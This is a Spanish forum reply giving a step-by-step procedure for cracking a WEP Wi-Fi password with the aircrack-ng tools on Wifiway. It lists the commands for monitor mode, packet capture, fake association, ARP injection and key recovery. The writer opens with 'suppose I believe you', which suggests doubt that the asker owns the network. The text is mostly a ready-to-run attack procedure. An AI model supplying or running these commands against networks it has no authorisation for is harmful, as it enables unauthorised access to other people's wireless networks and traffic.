Bueno, supongamos que te creo
Yo no se como lo hace la mayoria de la gente, seguro que más facil y rapido, pero yo lei en varios tema esto y con esto me quede. Te lo dire desde el principio.
Utilizo wifiway 2.01 aunque la verdad poco importa eso:
Paso nº 1: Poner la tarjeta en modo monitor
-> abres consola y escribes: airmon-ng start INTERFAZ
( en mi caso es wlan0 y quedaría así: airmon-ng start wlan0) No lo repitas al menos que la hayas quitado de modo monitor antes. Despues te monta mon0.
Paso nº 2: Abrir airodump y escanear red/es ¡LA TUYA!
-> airodump-ng -w nombre -c canal mon0
o si sabes tu bssid had lo siguiente y asi escaneas solo tu red
-> airodump-ng -w nombre --bssid XX:XX:XX:XX:XX:XX mon0
* -w = sirve para que te guarde el archivo de captura con el nombre que le indiques a continuación
* -c se utiliza para concretar en que canal quieres que ebusque, para que sea mas facil
* BSSID = MAC del Router, Punto de acceso
Paso nº 3: Asociarse al modem
-> aireplay-ng -1 30 -e ESSID DE TU RED mon0
*ESSID = nombre que tiene tu red.
Paso nº 4: Inyeccion de datos
-> aireplay-ng -3 -e ESSID mon0
Y empieza a inyectar paquetes.
Cuando llegas a tener 75000 paquetes (te fijas en data) inicias el 5º paso.
Paso nº 5:
Aircrack-ptw (y arrastras con el raton el fichero de captura, que suele estar en la carpeta personal o algo asi. No me acuerdo del nombre y estoy en Windows ahora)
Te da una lista con los datos que tiene y seleccionas la que necesites (1,2…) y al cabo de un tiempo (poco) te muestra la contraseña.
